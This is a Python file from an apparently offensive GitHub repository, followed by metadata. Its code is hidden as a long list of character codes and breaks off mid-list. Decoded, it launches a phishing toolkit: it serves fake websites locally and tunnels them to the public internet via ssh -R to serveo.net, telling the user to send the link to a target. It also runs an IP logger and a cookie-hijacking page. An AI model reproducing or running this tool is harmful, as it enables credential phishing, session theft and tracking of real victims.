2746f2bfab9222260e2d22482a7b2408971cda51 | f7ba8dfe90d5ddf2c2f90950fc36a91cf43f84c6 | /data/create_server.py | 7d3c811bc2a978c4baf1577fab5339a0e7767aaa | [] | no_license | Sazxt/asu-ngentod | 7e9f5c3fd563d9cc52eb886e697f3344b7e19b25 | cc3d4f830efb383bef3c3eda9e30b528ca7ce7f9 | refs/heads/master | 2020-07-27T21:48:52.966235 | 2019-09-18T05:32:13 | 2019-09-18T05:32:13 | 209,225,278 | 1 | 4 | null | null | null | null | UTF-8 | Python | false | false | 33,006 | py |
d=[35, 45, 42, 45, 99, 111, 100, 105, 110, 103, 58, 117, 116, 102, 45, 56, 45, 42, 45, 10, 35, 32, 67, 111, 100, 101, 100, 32, 66, 121, 32, 68, 101, 114, 97, 121, 10, 39, 39, 39, 10, 9, 32, 82, 101, 98, 117, 105, 108, 100, 32, 67, 111, 112, 121, 114, 105, 103, 104, 116, 32, 67, 97, 110, 39, 116, 32, 109, 97, 107, 101, 32, 117, 32, 114, 101, 97, 108, 32, 112, 114, 111, 103, 114, 97, 109, 109, 101, 114, 10, 39, 39, 39, 10, 35, 32, 82, 101, 112, 111, 114, 116, 32, 66, 117, 103, 32, 79, 110, 32, 77, 121, 32, 79, 116, 104, 101, 114, 32, 83, 111, 115, 109, 101, 100, 10, 35, 32, 105, 110, 115, 116, 97, 103, 114, 97, 109, 58, 32, 64, 114, 101, 121, 121, 48, 53, 95, 10, 35, 32, 102, 97, 99, 101, 98, 111, 111, 107, 58, 32, 104, 116, 116, 112, 115, 58, 47, 47, 102, 97, 99, 101, 98, 111, 111, 107, 46, 99, 111, 109, 47, 97, 99, 104, 109, 97, 100, 46, 108, 117, 116, 104, 102, 105, 46, 104, 97, 100, 105, 46, 51, 10, 10, 105, 109, 112, 111, 114, 116, 32, 111, 115, 10, 105, 109, 112, 111, 114, 116, 32, 115, 121, 115, 10, 105, 109, 112, 111, 114, 116, 32, 116, 105, 109, 101, 10, 105, 109, 112, 111, 114, 116, 32, 114, 101, 113, 117, 101, 115, 116, 115, 10, 102, 114, 111, 109, 32, 100, 97, 116, 97, 32, 105, 109, 112, 111, 114, 116, 32, 115, 101, 114, 118, 101, 114, 10, 102, 114, 111, 109, 32, 100, 97, 116, 97, 46, 99, 111, 108, 111, 114, 32, 105, 109, 112, 111, 114, 116, 32, 42, 10, 102, 114, 111, 109, 32, 100, 97, 116, 97, 32, 105, 109, 112, 111, 114, 116, 32, 99, 97, 99, 104, 101, 10, 105, 109, 112, 111, 114, 116, 32, 115, 117, 98, 112, 114, 111, 99, 101, 115, 115, 32, 97, 115, 32, 107, 111, 110, 116, 111, 108, 10, 10, 99, 97, 99, 104, 101, 46, 99, 108, 101, 97, 110, 67, 97, 99, 104, 101, 40, 41, 10, 10, 99, 108, 97, 115, 115, 32, 99, 101, 107, 95, 114, 101, 113, 117, 105, 114, 101, 100, 58, 10, 9, 100, 101, 102, 32, 95, 95, 105, 110, 105, 116, 95, 95, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 119, 105, 116, 104, 32, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 
46, 116, 120, 116, 34, 44, 34, 119, 34, 41, 32, 97, 115, 32, 115, 58, 10, 9, 9, 9, 116, 114, 121, 58, 10, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 34, 119, 104, 105, 99, 104, 34, 44, 34, 115, 115, 104, 34, 93, 44, 10, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 115, 44, 115, 116, 100, 105, 110, 61, 115, 44, 115, 116, 100, 111, 117, 116, 61, 115, 41, 10, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 49, 41, 10, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 34, 119, 104, 105, 99, 104, 34, 44, 34, 112, 104, 112, 34, 93, 44, 10, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 115, 44, 115, 116, 100, 105, 110, 61, 115, 44, 115, 116, 100, 111, 117, 116, 61, 115, 41, 10, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 49, 41, 10, 9, 9, 9, 101, 120, 99, 101, 112, 116, 58, 112, 97, 115, 115, 10, 9, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 9, 111, 61, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 41, 46, 114, 101, 97, 100, 40, 41, 10, 9, 9, 9, 9, 105, 102, 32, 34, 47, 115, 115, 104, 34, 32, 105, 110, 32, 111, 58, 10, 9, 9, 9, 9, 9, 112, 97, 115, 115, 10, 9, 9, 9, 9, 101, 108, 115, 101, 58, 10, 9, 9, 9, 9, 9, 115, 121, 115, 46, 101, 120, 105, 116, 40, 34, 37, 115, 91, 33, 93, 37, 115, 32, 111, 112, 101, 110, 115, 115, 104, 32, 110, 111, 116, 32, 105, 110, 115, 116, 97, 108, 108, 101, 100, 34, 37, 40, 82, 44, 78, 41, 41, 10, 9, 9, 9, 9, 105, 102, 32, 34, 47, 112, 104, 112, 34, 32, 105, 110, 32, 111, 58, 10, 9, 9, 9, 9, 9, 98, 114, 101, 97, 107, 10, 9, 9, 9, 9, 101, 108, 115, 101, 58, 10, 9, 9, 9, 9, 9, 115, 121, 115, 46, 101, 120, 105, 116, 40, 34, 37, 115, 91, 33, 93, 37, 115, 32, 112, 104, 112, 32, 110, 111, 116, 32, 105, 110, 115, 116, 97, 108, 108, 101, 100, 46, 34, 37, 40, 82, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 10, 9, 9, 9, 9, 9, 10, 99, 108, 97, 115, 115, 32, 112, 104, 105, 115, 105, 110, 103, 40, 
41, 58, 10, 9, 100, 101, 102, 32, 95, 95, 105, 110, 105, 116, 95, 95, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 99, 101, 107, 95, 114, 101, 113, 117, 105, 114, 101, 100, 40, 41, 10, 9, 9, 115, 101, 108, 102, 46, 110, 103, 101, 110, 116, 111, 100, 40, 41, 10, 9, 100, 101, 102, 32, 110, 103, 101, 110, 116, 111, 100, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 115, 101, 108, 102, 46, 97, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 105, 116, 101, 32, 78, 97, 109, 101, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 105, 102, 32, 40, 115, 101, 108, 102, 46, 97, 32, 61, 61, 32, 34, 34, 41, 58, 10, 9, 9, 9, 114, 101, 116, 117, 114, 110, 32, 115, 101, 108, 102, 46, 110, 103, 101, 110, 116, 111, 100, 40, 41, 10, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 80, 108, 101, 97, 115, 101, 32, 87, 97, 105, 116, 32, 67, 114, 101, 97, 116, 105, 110, 103, 32, 70, 97, 107, 101, 32, 87, 101, 98, 115, 105, 116, 101, 115, 32, 46, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 115, 101, 108, 102, 46, 103, 101, 110, 101, 114, 97, 116, 101, 40, 41, 10, 9, 9, 10, 9, 100, 101, 102, 32, 103, 101, 110, 101, 114, 97, 116, 101, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 119, 105, 116, 104, 32, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 44, 34, 119, 34, 41, 32, 97, 115, 32, 109, 101, 109, 101, 107, 58, 10, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 10, 9, 9, 9, 9, 9, 9, 91, 34, 112, 104, 112, 34, 44, 34, 45, 83, 34, 44, 34, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 44, 34, 45, 116, 34, 44, 10, 9, 9, 9, 9, 9, 9, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 112, 104, 105, 115, 105, 110, 103, 34, 93, 44, 10, 9, 9, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 10, 9, 9, 9, 9, 9, 9, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 
101, 107, 10, 9, 9, 9, 41, 10, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 51, 41, 10, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 79, 112, 101, 110, 32, 78, 101, 119, 32, 84, 97, 98, 32, 65, 110, 100, 32, 82, 117, 110, 32, 37, 115, 97, 115, 117, 46, 112, 121, 37, 115, 32, 115, 101, 108, 101, 99, 116, 32, 83, 101, 114, 118, 101, 114, 32, 76, 105, 115, 116, 101, 110, 101, 114, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 101, 110, 100, 32, 84, 104, 105, 115, 32, 76, 105, 110, 107, 32, 79, 110, 32, 89, 111, 117, 114, 32, 84, 97, 114, 103, 101, 116, 32, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 112, 114, 101, 115, 115, 32, 39, 37, 115, 121, 101, 115, 37, 115, 39, 32, 113, 117, 105, 99, 107, 108, 121, 32, 105, 102, 32, 121, 111, 117, 32, 102, 105, 110, 100, 32, 97, 32, 113, 117, 101, 115, 116, 105, 111, 110, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 119, 97, 105, 116, 105, 110, 103, 32, 115, 101, 114, 118, 101, 114, 32, 97, 99, 116, 105, 118, 101, 32, 46, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 10, 9, 9, 9, 9, 9, 34, 115, 115, 104, 34, 44, 34, 45, 82, 34, 44, 10, 9, 9, 9, 9, 9, 34, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 58, 56, 48, 58, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 46, 102, 111, 114, 109, 97, 116, 40, 10, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 41, 44, 10, 9, 9, 9, 9, 9, 34, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 93, 44, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 10, 9, 9, 9, 9, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 10, 9, 9, 
9, 41, 10, 9, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 9, 114, 61, 114, 101, 113, 117, 101, 115, 116, 115, 46, 103, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 37, 115, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 37, 40, 115, 101, 108, 102, 46, 97, 41, 41, 10, 9, 9, 9, 9, 105, 102, 32, 114, 46, 115, 116, 97, 116, 117, 115, 95, 99, 111, 100, 101, 32, 61, 61, 32, 50, 48, 48, 58, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 98, 101, 110, 103, 111, 110, 103, 40, 41, 10, 9, 9, 9, 9, 9, 98, 114, 101, 97, 107, 10, 9, 9, 9, 9, 9, 111, 115, 46, 115, 121, 115, 116, 101, 109, 40, 34, 107, 105, 108, 108, 97, 108, 108, 32, 112, 104, 112, 59, 107, 105, 108, 108, 97, 108, 108, 32, 115, 115, 104, 34, 41, 10, 9, 100, 101, 102, 32, 98, 101, 110, 103, 111, 110, 103, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 97, 61, 91, 34, 124, 34, 44, 34, 47, 34, 44, 34, 45, 34, 44, 34, 92, 92, 34, 93, 10, 9, 9, 9, 102, 111, 114, 32, 120, 32, 105, 110, 32, 97, 58, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 32, 34, 92, 114, 91, 123, 125, 43, 123, 125, 93, 32, 82, 117, 110, 110, 105, 110, 103, 32, 87, 101, 98, 115, 101, 114, 118, 101, 114, 58, 32, 104, 116, 116, 112, 58, 47, 47, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 32, 46, 46, 32, 123, 125, 32, 32, 34, 46, 102, 111, 114, 109, 97, 116, 40, 71, 44, 78, 44, 115, 101, 108, 102, 46, 97, 44, 10, 9, 9, 9, 9, 120, 10, 9, 9, 9, 9, 41, 44, 59, 115, 121, 115, 46, 115, 116, 100, 111, 117, 116, 46, 102, 108, 117, 115, 104, 40, 41, 59, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 48, 46, 50, 48, 41, 10, 9, 9, 9, 9, 9, 9, 9, 10, 99, 108, 97, 115, 115, 32, 108, 111, 99, 97, 116, 111, 114, 40, 41, 58, 10, 9, 100, 101, 102, 32, 95, 95, 105, 110, 105, 116, 95, 95, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 99, 101, 107, 95, 114, 101, 113, 117, 105, 
114, 101, 100, 40, 41, 10, 9, 9, 115, 101, 108, 102, 46, 105, 112, 76, 111, 103, 103, 101, 114, 40, 41, 10, 9, 100, 101, 102, 32, 105, 112, 76, 111, 103, 103, 101, 114, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 105, 102, 32, 111, 115, 46, 112, 97, 116, 104, 46, 101, 120, 105, 115, 116, 115, 40, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 99, 111, 111, 107, 105, 101, 72, 105, 103, 104, 74, 97, 99, 107, 105, 110, 103, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 34, 41, 58, 10, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 70, 105, 108, 101, 32, 105, 110, 100, 101, 120, 46, 112, 104, 112, 32, 119, 97, 115, 32, 102, 111, 117, 110, 100, 32, 105, 110, 32, 37, 115, 99, 111, 111, 107, 105, 101, 72, 105, 103, 104, 74, 97, 99, 107, 105, 110, 103, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 37, 115, 34, 37, 40, 82, 44, 78, 44, 82, 44, 78, 41, 41, 10, 9, 9, 9, 114, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 63, 37, 115, 93, 32, 68, 105, 100, 32, 117, 32, 119, 97, 110, 116, 32, 116, 111, 32, 101, 100, 105, 116, 32, 115, 105, 116, 101, 63, 32, 121, 47, 110, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 105, 102, 32, 114, 46, 108, 111, 119, 101, 114, 40, 41, 32, 61, 61, 32, 34, 121, 34, 58, 10, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 105, 116, 101, 32, 78, 97, 109, 101, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 99, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 72, 84, 77, 76, 32, 84, 105, 116, 108, 101, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 98, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 65, 108, 101, 114, 116, 32, 77, 115, 103, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 100, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 
93, 32, 72, 84, 77, 76, 32, 66, 111, 100, 121, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 115, 101, 114, 118, 101, 114, 46, 99, 111, 111, 107, 105, 101, 106, 97, 99, 107, 40, 99, 44, 98, 44, 100, 41, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 80, 108, 101, 97, 115, 101, 32, 87, 97, 105, 116, 32, 67, 114, 101, 97, 116, 105, 110, 103, 32, 70, 97, 107, 101, 32, 87, 101, 98, 115, 105, 116, 101, 115, 32, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 119, 105, 116, 104, 32, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 44, 34, 119, 34, 41, 32, 97, 115, 32, 109, 101, 109, 101, 107, 58, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 10, 9, 9, 9, 9, 9, 9, 91, 34, 112, 104, 112, 34, 44, 34, 45, 83, 34, 44, 34, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 44, 34, 45, 116, 34, 44, 10, 9, 9, 9, 9, 9, 9, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 99, 111, 111, 107, 105, 101, 72, 105, 103, 104, 74, 97, 99, 107, 105, 110, 103, 34, 93, 44, 10, 9, 9, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 10, 9, 9, 9, 9, 9, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 51, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 79, 112, 101, 110, 32, 78, 101, 119, 32, 84, 97, 98, 32, 65, 110, 100, 32, 82, 117, 110, 32, 37, 115, 97, 115, 117, 46, 112, 121, 37, 115, 32, 115, 101, 108, 101, 99, 116, 32, 83, 101, 114, 118, 101, 114, 32, 76, 105, 115, 116, 101, 110, 101, 114, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 101, 110, 100, 32, 84, 104, 105, 115, 32, 76, 105, 110, 107, 32, 79, 110, 32, 89, 111, 117, 114, 32, 
84, 97, 114, 103, 101, 116, 32, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 112, 114, 101, 115, 115, 32, 39, 37, 115, 121, 101, 115, 37, 115, 39, 32, 113, 117, 105, 99, 107, 108, 121, 32, 105, 102, 32, 121, 111, 117, 32, 102, 105, 110, 100, 32, 97, 32, 113, 117, 101, 115, 116, 105, 111, 110, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 119, 97, 105, 116, 105, 110, 103, 32, 115, 101, 114, 118, 101, 114, 32, 97, 99, 116, 105, 118, 101, 32, 46, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 10, 9, 9, 9, 9, 9, 9, 9, 34, 115, 115, 104, 34, 44, 34, 45, 82, 34, 44, 10, 9, 9, 9, 9, 9, 9, 9, 34, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 58, 56, 48, 58, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 46, 102, 111, 114, 109, 97, 116, 40, 10, 9, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 41, 44, 10, 9, 9, 9, 9, 9, 9, 9, 34, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 10, 9, 9, 9, 9, 9, 93, 44, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 41, 10, 9, 9, 9, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 9, 9, 9, 114, 61, 114, 101, 113, 117, 101, 115, 116, 115, 46, 103, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 37, 115, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 37, 40, 115, 101, 108, 102, 46, 97, 41, 41, 10, 9, 9, 9, 9, 9, 9, 105, 102, 32, 114, 46, 115, 116, 97, 116, 117, 115, 95, 99, 111, 100, 101, 32, 61, 61, 32, 50, 48, 48, 58, 10, 9, 9, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 98, 101, 110, 103, 111, 110, 103, 40, 41, 10, 
9, 9, 9, 9, 9, 9, 9, 98, 114, 101, 97, 107, 10, 9, 9, 9, 9, 9, 9, 9, 111, 115, 46, 115, 121, 115, 116, 101, 109, 40, 34, 107, 105, 108, 108, 97, 108, 108, 32, 112, 104, 112, 59, 107, 105, 108, 108, 97, 108, 108, 32, 115, 115, 104, 34, 41, 10, 9, 9, 9, 101, 108, 115, 101, 58, 10, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 105, 116, 101, 32, 78, 97, 109, 101, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 80, 108, 101, 97, 115, 101, 32, 87, 97, 105, 116, 32, 67, 114, 101, 97, 116, 105, 110, 103, 32, 70, 97, 107, 101, 32, 87, 101, 98, 115, 105, 116, 101, 115, 32, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 119, 105, 116, 104, 32, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 44, 34, 119, 34, 41, 32, 97, 115, 32, 109, 101, 109, 101, 107, 58, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 10, 9, 9, 9, 9, 9, 9, 91, 34, 112, 104, 112, 34, 44, 34, 45, 83, 34, 44, 34, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 44, 34, 45, 116, 34, 44, 10, 9, 9, 9, 9, 9, 9, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 99, 111, 111, 107, 105, 101, 72, 105, 103, 104, 74, 97, 99, 107, 105, 110, 103, 34, 93, 44, 10, 9, 9, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 10, 9, 9, 9, 9, 9, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 52, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 79, 112, 101, 110, 32, 78, 101, 119, 32, 84, 97, 98, 32, 65, 110, 100, 32, 82, 117, 110, 32, 37, 115, 97, 115, 117, 46, 112, 121, 37, 115, 32, 115, 101, 108, 101, 99, 116, 32, 83, 101, 114, 118, 101, 114, 32, 76, 
105, 115, 116, 101, 110, 101, 114, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 101, 110, 100, 32, 84, 104, 105, 115, 32, 76, 105, 110, 107, 32, 79, 110, 32, 89, 111, 117, 114, 32, 84, 97, 114, 103, 101, 116, 32, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 112, 114, 101, 115, 115, 32, 39, 37, 115, 121, 101, 115, 37, 115, 39, 32, 113, 117, 105, 99, 107, 108, 121, 32, 105, 102, 32, 121, 111, 117, 32, 102, 105, 110, 100, 32, 97, 32, 113, 117, 101, 115, 116, 105, 111, 110, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 119, 97, 105, 116, 105, 110, 103, 32, 115, 101, 114, 118, 101, 114, 32, 97, 99, 116, 105, 118, 101, 32, 46, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 10, 9, 9, 9, 9, 9, 9, 9, 34, 115, 115, 104, 34, 44, 34, 45, 82, 34, 44, 10, 9, 9, 9, 9, 9, 9, 9, 34, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 58, 56, 48, 58, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 46, 102, 111, 114, 109, 97, 116, 40, 10, 9, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 41, 44, 10, 9, 9, 9, 9, 9, 9, 9, 34, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 10, 9, 9, 9, 9, 9, 93, 44, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 9, 9, 9, 114, 61, 114, 101, 113, 117, 101, 115, 116, 115, 46, 103, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 37, 115, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 
37, 40, 115, 101, 108, 102, 46, 97, 41, 41, 10, 9, 9, 9, 9, 9, 9, 105, 102, 32, 114, 46, 115, 116, 97, 116, 117, 115, 95, 99, 111, 100, 101, 32, 61, 61, 32, 50, 48, 48, 58, 10, 9, 9, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 98, 101, 110, 103, 111, 110, 103, 40, 41, 10, 9, 9, 9, 9, 9, 9, 9, 98, 114, 101, 97, 107, 10, 9, 9, 9, 9, 9, 9, 9, 111, 115, 46, 115, 121, 115, 116, 101, 109, 40, 34, 107, 105, 108, 108, 97, 108, 108, 32, 112, 104, 112, 59, 107, 105, 108, 108, 97, 108, 108, 32, 115, 115, 104, 34, 41, 10, 9, 100, 101, 102, 32, 98, 101, 110, 103, 111, 110, 103, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 97, 61, 91, 34, 124, 34, 44, 34, 47, 34, 44, 34, 45, 34, 44, 34, 92, 92, 34, 93, 10, 9, 9, 9, 102, 111, 114, 32, 120, 32, 105, 110, 32, 97, 58, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 32, 34, 92, 114, 91, 123, 125, 43, 123, 125, 93, 32, 82, 117, 110, 110, 105, 110, 103, 32, 87, 101, 98, 115, 101, 114, 118, 101, 114, 58, 32, 104, 116, 116, 112, 58, 47, 47, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 32, 46, 46, 32, 123, 125, 32, 32, 34, 46, 102, 111, 114, 109, 97, 116, 40, 71, 44, 78, 44, 115, 101, 108, 102, 46, 97, 44, 10, 9, 9, 9, 9, 120, 10, 9, 9, 9, 9, 41, 44, 59, 115, 121, 115, 46, 115, 